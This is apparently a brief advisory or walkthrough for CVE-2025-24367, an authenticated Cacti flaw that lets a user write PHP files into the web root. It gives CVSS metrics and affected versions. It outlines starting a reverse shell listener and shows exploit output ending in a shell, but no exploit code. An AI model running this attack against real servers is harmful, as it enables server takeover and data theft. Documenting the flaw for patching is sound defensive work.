CVE-2025-24367:
Cacti RCE
CVE-2025-24367 is a Cacti bug disclosed January 27, 2025 where a logged-in user can abuse the graph/graph template features to make Cacti create arbitrary PHP files in the web root. Once that happens, the attacker can request that file in a browser to get remote code execution, potentially taking over the server process, stealing data, changing configs, or planting a backdoor.
First start a reverse shell listener
listening on $LPORT ...
Then run the exploit on the target
[+] Cacti Instance Found! [+] Serving HTTP on port 80 [+] Login Successful! [+] Got graph ID: 226 [i] Created PHP filename: Dgvzz.php [+] Got payload: /bash [i] Created PHP filename: pzs79.php [+] Hit timeout, looks good for shell, check your listener! [+] Stopped HTTP server on port 80
8.7
High risk
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Compexity
low
Privileges
low
Authentication
user account
Affected
<= 1.2.28
Patched
1.2.29